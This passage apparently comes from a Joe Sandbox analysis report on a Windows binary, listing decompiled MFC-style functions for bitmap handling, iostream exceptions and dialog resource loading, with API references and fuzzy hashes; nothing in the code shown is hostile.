      • SetPixel.GDI32(?,?,00000000,?), ref: 00A384AF
      • SelectObject.GDI32(?,?), ref: 00A384E6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
      • String ID: $
      • API String ID: 1266819874-227171996
      • Opcode ID: 0160f1b5adf55c16724e6ca93b95ff16685b0334999189033ded1e95d084b8ab
      • Instruction ID: e9e180dbd9714a755c25420e28feb43025fa5b1ed72b63d04d568634f90ef762
      • Opcode Fuzzy Hash: 0160f1b5adf55c16724e6ca93b95ff16685b0334999189033ded1e95d084b8ab
      • Instruction Fuzzy Hash: 9D71ED71D00329CBDF21DFA8CC84AADBBB5FF18314F2041AAE519AB252DB359985DF40
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A535DB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 137COMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E00A535DB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t53;
				void* _t65;
				signed int* _t73;
				unsigned int _t87;
				signed int _t91;
				signed int _t93;
				void* _t94;
				signed int _t100;
				void* _t103;
				signed int _t109;
				void* _t110;

				_t94 = __edx;
				_push(0x4c);
				E00AAD232(0xacf9dc, __ebx, __edi, __esi);
				if( *(_t110 + 8) != 0) {
					if(GetObjectA( *(_t110 + 8), 0x18, _t110 - 0x58) == 0 ||  *((intOrPtr*)(_t110 - 0x44)) == 0) {
						goto L1;
					} else {
						 *(_t110 - 0x1c) =  *(_t110 - 0x50);
						 *(_t110 - 0x10) = 0;
						 *(_t110 - 0x20) =  *(_t110 - 0x54);
						 *(_t110 - 0x14) = E00A52BF6(_t110 - 0x20, _t110 - 0x10);
						 *(_t110 - 0x18) = E00AAFF44(_t94,  *(_t110 - 0x50));
						if( *(_t110 - 0x14) != 0) {
							_t61 =  *(_t110 - 0x54) *  *(_t110 - 0x18);
							 *(_t110 - 0x1c) =  *(_t110 - 0x54) *  *(_t110 - 0x18);
							if( *((short*)(_t110 - 0x46)) != 0x20) {
								E009BA639(_t110 - 0x40);
								 *(_t110 - 4) = 0;
								E009BAD44(0, _t110 - 0x40, _t94, CreateCompatibleDC, CreateCompatibleDC(0));
								_t65 = SelectObject( *(_t110 - 0x3c),  *(_t110 + 8));
								 *(_t110 + 8) = _t65;
								if(_t65 != 0) {
									E009BA639(_t110 - 0x30);
									 *(_t110 - 4) = 1;
									E009BAD44(0, _t110 - 0x30, _t94, CreateCompatibleDC, CreateCompatibleDC(0));
									_t103 = SelectObject( *(_t110 - 0x2c),  *(_t110 - 0x14));
									BitBlt( *(_t110 - 0x2c), 0, 0,  *(_t110 - 0x54),  *(_t110 - 0x18),  *(_t110 - 0x3c), 0, 0, "singapore");
									if(_t103 != 0) {
										SelectObject( *(_t110 - 0x2c), _t103);
									}
									SelectObject( *(_t110 - 0x3c),  *(_t110 + 8));
									_t87 =  *(_t110 + 0xc);
									_t73 =  *(_t110 - 0x10);
									if(_t87 != 0xffffffff) {
										_t109 =  *(_t110 - 0x1c);
										_t100 = (_t87 >> 0x00000008 & 0x000000ff | (_t87 & 0x000000ff) << 0x00000008) << 0x00000008 | _t87 >> 0x00000010 & 0x000000ff;
										if(_t109 > 0) {
											do {
												_t91 =  *_t73;
												if(_t91 == _t100) {
													 *_t73 = 0;
												} else {
													 *_t73 = _t91 | 0xff000000;
												}
												_t73 =  &(_t73[1]);
												_t109 = _t109 - 1;
											} while (_t109 != 0);
										}
									} else {
										_t93 =  *(_t110 - 0x1c);
										if(_t93 > 0) {
											do {
												 *_t73 =  *_t73 | 0xff000000;
												_t73 =  &(_t73[1]);
												_t93 = _t93 - 1;
											} while (_t93 != 0);
										}
									}
									 *(_t110 - 4) = 0;
									E009BADC5(_t110 - 0x30);
								}
								 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
								E009BADC5(_t110 - 0x40);
							} else {
								E00AAB080( *(_t110 - 0x10),  *((intOrPtr*)(_t110 - 0x44)), _t61 << 2);
							}
						}
						_t53 =  *(_t110 - 0x14);
					}
				} else {
					L1:
					_t53 = 0;
				}
				return E00AAD30A(_t53);
			}














      0x00a535db
      0x00a535db
      0x00a535e2
      0x00a535ec
      0x00a53606
      0x00000000
      0x00a5360d
      0x00a53615
      0x00a53620
      0x00a53623
      0x00a5362c
      0x00a53635
      0x00a5363b
      0x00a53644
      0x00a5364d
      0x00a53650
      0x00a5366c
      0x00a53678
      0x00a53681
      0x00a53692
      0x00a53694
      0x00a53699
      0x00a536a2
      0x00a536a8
      0x00a536b2
      0x00a536c9
      0x00a536d6
      0x00a536de
      0x00a536e4
      0x00a536e4
      0x00a536ec
      0x00a536ee
      0x00a536f1
      0x00a536f7
      0x00a5371e
      0x00a5372a
      0x00a5372e
      0x00a53730
      0x00a53730
      0x00a53734
      0x00a53740
      0x00a53736
      0x00a5373c
      0x00a5373c
      0x00a53742
      0x00a53745
      0x00a53745
      0x00a53730
      0x00a536f9
      0x00a536f9
      0x00a536fe
      0x00a53700
      0x00a53700
      0x00a53706
      0x00a53709
      0x00a53709
      0x00a5370c
      0x00a536fe
      0x00a5374b
      0x00a5374e
      0x00a5374e
      0x00a53753
      0x00a5375a
      0x00a53652
      0x00a5365c
      0x00a53661
      0x00a53650
      0x00a5375f
      0x00a5375f
      0x00a535ee
      0x00a535ee
      0x00a535ee
      0x00a535ee
      0x00a53767

      APIs
      • __EH_prolog3.LIBCMT ref: 00A535E2
      • GetObjectA.GDI32(00000018,00000018,00AE8844), ref: 00A535FE
      • _memmove.LIBCMT ref: 00A5365C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3Object_memmove
      • String ID: $singapore
      • API String ID: 107514201-3479711124
      • Opcode ID: f6af52ed119e8ab337006a62d012282acf45bc9cdee5831075d89f8ea0ba5335
      • Instruction ID: 4429ef188a4f460caa69f720fbf2f56708a54388ae6ce23885b1facf54725a27
      • Opcode Fuzzy Hash: f6af52ed119e8ab337006a62d012282acf45bc9cdee5831075d89f8ea0ba5335
      • Instruction Fuzzy Hash: 88412AB2C10119AFCF15DFA4DD819EEBBB5FF88351B104029E912B72A1DB315E49DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A18A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 64COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A18A0(void* __ecx, signed int _a4, char* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				signed int _t31;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t39;
				signed char _t46;

				_t31 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t31;
				_t46 =  *(__ecx + 0x10) & _t31;
				if(_t46 != 0) {
					if(_a8 != 0) {
						E00AAB8C9(0, 0);
					}
					if((_t46 & 0x00000004) != 0) {
						_t39 = E00AC5F23();
						_a8 = "ios_base::badbit set";
						E00AAAF07( &_v24,  &_a8);
						_t46 =  &_v24;
						_v12 = 1;
						_v8 = _t39;
						_v24 = 0xad6e70;
						E00AAB8C9(_t46, 0xb0b024);
					}
					if((_t46 & 0x00000002) != 0) {
						_t35 = E00AC5F23();
						_a8 = "ios_base::failbit set";
						E00AAAF07( &_v24,  &_a8);
						_v12 = 1;
						_v8 = _t35;
						_v24 = 0xad6e70;
						E00AAB8C9( &_v24, 0xb0b024);
					}
					_t32 = E00AC5F23();
					_a8 = "ios_base::eofbit set";
					E00AAAF07( &_v24,  &_a8);
					_v12 = 1;
					_v8 = _t32;
					_v24 = 0xad6e70;
					return E00AAB8C9( &_v24, 0xb0b024);
				}
				return _t31;
			}











      0x009a18a6
      0x009a18a9
      0x009a18b2
      0x009a18b4
      0x009a18be
      0x009a18c4
      0x009a18c4
      0x009a18d1
      0x009a18d3
      0x009a18e1
      0x009a18e8
      0x009a18f2
      0x009a18f6
      0x009a18f9
      0x009a18fc
      0x009a1903
      0x009a1903
      0x009a190b
      0x009a190d
      0x009a191b
      0x009a1922
      0x009a1930
      0x009a1933
      0x009a1936
      0x009a193d
      0x009a193d
      0x009a1942
      0x009a1950
      0x009a1957
      0x009a1965
      0x009a1968
      0x009a196b
      0x00000000
      0x009a1972
      0x009a197a

      APIs
      • __CxxThrowException@8.LIBCMT ref: 009A18C4
        • Part of subcall function 00AAB8C9: RaiseException.KERNEL32(?,?,009A1977,?,?,?,?,?,009A1977,?,00B0B024,00000000), ref: 00AAB90B
      • std::exception::exception.LIBCMT ref: 009A18E8
      • __CxxThrowException@8.LIBCMT ref: 009A1903
      • std::exception::exception.LIBCMT ref: 009A1922
      • __CxxThrowException@8.LIBCMT ref: 009A193D
      • std::exception::exception.LIBCMT ref: 009A1957
      • __CxxThrowException@8.LIBCMT ref: 009A1972
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
      • API String ID: 4237746311-1866435925
      • Opcode ID: d504947b52448c5b6d714515f7a779dd1c719bdf3ed7c498accba3c788d4a267
      • Instruction ID: 6714e3ea68f22bb29b113168726d6a9ef4db9f73443736e47a2e54347ee1ac41
      • Opcode Fuzzy Hash: d504947b52448c5b6d714515f7a779dd1c719bdf3ed7c498accba3c788d4a267
      • Instruction Fuzzy Hash: DB2148F5800208ABCB05DF98C541BEEB7F86F55310F14804EF55567281EB745B48CBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4DF8 Relevance: 16.6, APIs: 11, Instructions: 139COMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E009B4DF8(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed int _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E00AAD265(0xac841f, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x80);
				 *(_t101 - 0x18) =  *(__ecx + 0x7c);
				_t54 = E009BD77F(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x78);
				if( *(_t100 + 0x78) != 0) {
					_t96 =  *(E009BD77F(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x78), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E009B4942(_t84, _t100, __eflags);
					E009AC9C6(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E009A6B56();
								 *(_t101 - 0x24) = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x14c))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E009B0BF8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E009B0C13(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E009AED3F(_t84, __eflags, _t100);
					_t58 = E009AC90B(_t84, _t86, _t94,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E009B4C39(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x58) & 0x00000010;
						if(( *(_t100 + 0x58) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E009B0A7A(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E009AC4CD(_t100, _t94, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E009B0DD3(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E009B0C13(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E009B4984(_t84, _t100, _t94, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x78) - _t97;
					if( *(_t100 + 0x78) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x60);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E00AAD30A(_t63);
				}
			}
















      0x009b4df8
      0x009b4df8
      0x009b4df8
      0x009b4dff
      0x009b4e04
      0x009b4e06
      0x009b4e0f
      0x009b4e15
      0x009b4e18
      0x009b4e1d
      0x009b4e20
      0x009b4e22
      0x009b4e25
      0x009b4e2c
      0x009b4e3d
      0x009b4e43
      0x009b4e43
      0x009b4e49
      0x009b4e4e
      0x009b4e54
      0x009b4e54
      0x009b4e5a
      0x009b4e64
      0x009b4e6b
      0x009b4e6e
      0x009b4e73
      0x009b4e76
      0x009b4e79
      0x009b4e7c
      0x009b4e7f
      0x009b4e87
      0x009b4e8a
      0x009b4e95
      0x009b4e97
      0x009b4e9e
      0x009b4ea4
      0x009b4eb0
      0x009b4eb2
      0x009b4eb5
      0x009b4eb7
      0x009b4ebb
      0x009b4ec3
      0x009b4ec5
      0x009b4ec7
      0x009b4ece
      0x009b4ed0
      0x009b4ed4
      0x009b4ed6
      0x009b4edb
      0x009b4edb
      0x009b4ed0
      0x009b4ec5
      0x009b4eb7
      0x009b4e97
      0x009b4e8a
      0x009b4ee2
      0x009b4ee7
      0x009b4eef
      0x009b4ef4
      0x009b4ef5
      0x009b4ef6
      0x009b4efb
      0x009b4f00
      0x009b4f02
      0x009b4f04
      0x009b4f06
      0x009b4f0a
      0x009b4f0e
      0x009b4f11
      0x009b4f16
      0x009b4f1b
      0x009b4f1f
      0x009b4f1f
      0x009b4f23
      0x009b4f28
      0x009b4f28
      0x009b4f28
      0x009b4f2a
      0x009b4f2d
      0x009b4f3b
      0x009b4f3b
      0x009b4f2d
      0x009b4f40
      0x009b4f6b
      0x009b4f6e
      0x009b4f74
      0x009b4f74
      0x009b4f79
      0x009b4f7c
      0x009b4f83
      0x009b4f83
      0x009b4f89
      0x009b4f8c
      0x009b4f94
      0x009b4f97
      0x009b4f9c
      0x009b4f9c
      0x009b4f97
      0x009b4fa6
      0x009b4fab
      0x009b4fb0
      0x009b4fb3
      0x009b4fb8
      0x009b4fb8
      0x009b4fbe
      0x00000000
      0x009b4e5c
      0x009b4e5c
      0x009b4fc1
      0x009b4fc6
      0x009b4fc6

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009B4DFF
      • FindResourceA.KERNEL32(?,?,00000005), ref: 009B4E35
      • LoadResource.KERNEL32(?,00000000), ref: 009B4E3D
        • Part of subcall function 009AC9C6: UnhookWindowsHookEx.USER32(?), ref: 009AC9F6
      • LockResource.KERNEL32(?,00000024,009A4695,3A0E8B0C), ref: 009B4E4E
      • GetDesktopWindow.USER32 ref: 009B4E81
      • IsWindowEnabled.USER32(?), ref: 009B4E8F
      • EnableWindow.USER32(?,00000000), ref: 009B4E9E
        • Part of subcall function 009B0BF8: IsWindowEnabled.USER32(?), ref: 009B0C01
        • Part of subcall function 009B0C13: EnableWindow.USER32(?,009A4695), ref: 009B0C24
      • EnableWindow.USER32(?,00000001), ref: 009B4F83
      • GetActiveWindow.USER32 ref: 009B4F8E
      • SetActiveWindow.USER32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4F9C
      • FreeResource.KERNEL32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4FB8
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
      • String ID:
      • API String ID: 964565984-0
      • Opcode ID: c2446affbe3b59eb66e042ce004fb0fae04bd81c2b82656c4c99320c029f5127
      • Instruction ID: efb347edfd171d33ba27d753a95c4865980c191c1890e1164994b5e4b449e157
      • Opcode Fuzzy Hash: c2446affbe3b59eb66e042ce004fb0fae04bd81c2b82656c4c99320c029f5127
      • Instruction Fuzzy Hash: 17519030A007098FCB21AFA5CA857FEBBB5BF88721F20042DE512A71A2CB748941DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A3991B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 240windowCOMMON
      Download Yara Rule
      C-Code - Quality: 85%
      			E00A3991B(void* __ecx, unsigned int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v1032;
				signed int _v1036;
				unsigned int* _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				intOrPtr _v1056;
				char _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				unsigned int* _v1088;
				intOrPtr _v1096;
				char _v1104;
				void* _v1116;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t118;
				signed int _t126;
				signed int _t133;
				signed int _t135;
				signed int _t144;
				signed int _t151;
				intOrPtr _t160;
				void* _t161;
				intOrPtr _t162;
				signed int _t165;
				unsigned int _t181;
				signed int _t189;
				void* _t190;
				unsigned int _t194;
				unsigned int* _t195;
				signed int _t196;
				void* _t198;
				void* _t199;
				signed int _t200;
				intOrPtr _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;

				_t184 = __edx;
				_t206 = _t208;
				_t209 = _t208 - 0x44c;
				_t116 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t116 ^ _t206;
				_t160 = _a4;
				_t198 = __ecx;
				_v1056 = _t160;
				_t118 = E00A36C70(_t160);
				_v1040 = _v1040 & 0x00000000;
				_t189 = _t118;
				_t165 = 0x20;
				_v1064 = _t189;
				_v1052 = _t165;
				_v1044 = 0x22009;
				if((_t189 & 0x00020000) != 0) {
					_v1052 = _t118 >> 0x00000008 & 0x000000ff;
					_v1044 = _t189;
				}
				_t214 = _t189 & 0x00040000;
				if((_t189 & 0x00040000) != 0) {
					_v1052 = _t165;
					_v1040 = 1;
					_v1044 = 0x26200a;
				}
				_v1048 = E00A36C4A(_t160);
				if(E009D70FC(_t160, _t184, _t214, E00A36C24(_t160), _v1048, _v1052, 0, 0, _v1040) != 0) {
					_v1036 = _v1036 & 0x00000000;
					__eflags = _t189 & 0x00010000;
					if((_t189 & 0x00010000) == 0) {
						L25:
						__eflags = _v1044 - _t189;
						if(_v1044 != _t189) {
							E00A36CDE( &_v1080,  *(_t198 + 0xc),  *(_t198 + 0x10),  *((intOrPtr*)(_t198 + 0x14)), _v1044,  *((intOrPtr*)(_t198 + 8)));
							E00A3756E( &_v1060,  &_v1080);
							E00A3759D( &_v1060, _t160, 0, 0);
							_push(_v1060);
							L00AC656A();
							_push(_v1076);
							L00AC6570();
							goto L38;
						} else {
							_v1080 = _v1080 & 0x00000000;
							_v1076 = _v1076 & 0x00000000;
							_v1072 =  *(_t198 + 0xc);
							_v1068 =  *(_t198 + 0x10);
							_push( &_v1104);
							_push(_t189);
							_push(1);
							_t133 =  &_v1080;
							_push(_t133);
							_push( *((intOrPtr*)(_t160 + 4)));
							L00AC65CA();
							__eflags = _t133;
							if(_t133 == 0) {
								_t133 = 0;
								__eflags = 0;
							} else {
								 *(_t160 + 8) = _t133;
							}
							__eflags = _t133;
							if(_t133 == 0) {
								_v1044 = _v1044 & 0x00000000;
								_t162 =  *((intOrPtr*)(_t198 + 8));
								_t194 =  *(_t198 + 0xc) * _v1052 + 7 >> 3;
								__eflags =  *(_t198 + 0x10);
								_v1040 = _v1088;
								if( *(_t198 + 0x10) > 0) {
									do {
										E009A681A(_t162, _t194, _v1040, _t194);
										_v1040 = _v1040 + _v1096;
										_t162 = _t162 +  *((intOrPtr*)(_t198 + 0x14));
										_t209 = _t209 + 0x10;
										_v1044 = _v1044 + 1;
										__eflags = _v1044 -  *(_t198 + 0x10);
									} while (_v1044 <  *(_t198 + 0x10));
								}
								_t201 = _v1056;
								_t135 =  &_v1104;
								_push(_t135);
								_push( *((intOrPtr*)(_t201 + 4)));
								L00AC65D0();
								__eflags = _t135;
								if(_t135 != 0) {
									 *(_t201 + 8) = _t135;
								}
								L38:
								__eflags = _v1036;
								if(_v1036 != 0) {
									do {
										_t200 =  *_v1036;
										_v1036 = _t200;
										E00AAB4AB(_v1036);
										__eflags = _t200;
									} while (_t200 != 0);
								}
								_t126 = 0;
								__eflags = 0;
							} else {
								__eflags = _v1036;
								if(_v1036 != 0) {
									do {
										_t202 =  *_v1036;
										_v1036 = _t202;
										E00AAB4AB(_v1036);
										__eflags = _t202;
									} while (_t202 != 0);
								}
								goto L15;
							}
						}
					} else {
						_t195 = E00A36C92(_t160);
						_v1040 = _t195;
						__eflags = _t195 - 0x400;
						if(__eflags > 0) {
							L11:
							_t196 = E009B947A(_t160,  &_v1036, __eflags, _t195);
						} else {
							_push(_t195);
							__eflags = E009B935A(_t160, _t184, _t195, _t198, __eflags);
							if(__eflags == 0) {
								goto L11;
							} else {
								_t142 = E00AAD9E0(_t195);
								_t196 = _t209;
							}
						}
						__eflags = _t196;
						if(_t196 != 0) {
							E00A36CB8(_t142, _t160, _t196, _v1040);
							_t144 =  *(_t196 + 4);
							__eflags = _t144;
							if(_t144 == 0) {
								L18:
								__eflags = _v1036;
								if(_v1036 != 0) {
									do {
										_t203 =  *_v1036;
										_v1036 = _t203;
										E00AAB4AB(_v1036);
										__eflags = _t203;
									} while (_t203 != 0);
								}
								goto L6;
								L42:
							} else {
								__eflags = _t144 - 0x100;
								if(_t144 <= 0x100) {
									_v1048 = _v1048 & 0x00000000;
									__eflags = _t144;
									if(_t144 != 0) {
										_t38 = _t196 + 8; // 0x8
										_v1040 = _t38;
										do {
											_t181 =  *_v1040;
											_t151 = _v1048;
											_v1040 = _v1040 + 4;
											 *((char*)(_t206 + _t151 * 4 - 0x402)) = _t181 >> 0x10;
											_t184 = _t181 >> 8;
											_v1048 = _v1048 + 1;
											 *((char*)(_t206 + _t151 * 4 - 0x403)) = _t181 >> 8;
											 *(_t206 + _t151 * 4 - 0x404) = _t181;
											 *((char*)(_t206 + _t151 * 4 - 0x401)) = 0;
											__eflags = _v1048 -  *(_t196 + 4);
										} while (_v1048 <  *(_t196 + 4));
									}
									E00A36D19(_t198, 0,  *(_t196 + 4),  &_v1032);
									_t189 = _v1064;
									goto L25;
								} else {
									goto L18;
								}
							}
						} else {
							__eflags = _v1036 - _t196;
							if(_v1036 != _t196) {
								do {
									_t204 =  *_v1036;
									_v1036 = _t204;
									E00AAB4AB(_v1036);
									__eflags = _t204;
								} while (_t204 != 0);
							}
							L15:
							_t126 = 0x8007000e;
						}
					}
				} else {
					L6:
					_t126 = 0x80004005;
				}
				_pop(_t190);
				_pop(_t199);
				_pop(_t161);
				return E00AAB46A(_t126, _t161, _v8 ^ _t206, _t184, _t190, _t199);
				goto L42;
			}




















































      0x00a3991b
      0x00a3991e
      0x00a39920
      0x00a39926
      0x00a3992d
      0x00a39931
      0x00a39935
      0x00a3993a
      0x00a39940
      0x00a39945
      0x00a3994c
      0x00a39950
      0x00a39951
      0x00a39957
      0x00a3995d
      0x00a3996d
      0x00a39977
      0x00a3997d
      0x00a3997d
      0x00a39983
      0x00a39989
      0x00a3998b
      0x00a39991
      0x00a3999b
      0x00a3999b
      0x00a399ae
      0x00a399d9
      0x00a399e5
      0x00a399ec
      0x00a399f2
      0x00a39b23
      0x00a39b23
      0x00a39b29
      0x00a39c35
      0x00a39c47
      0x00a39c57
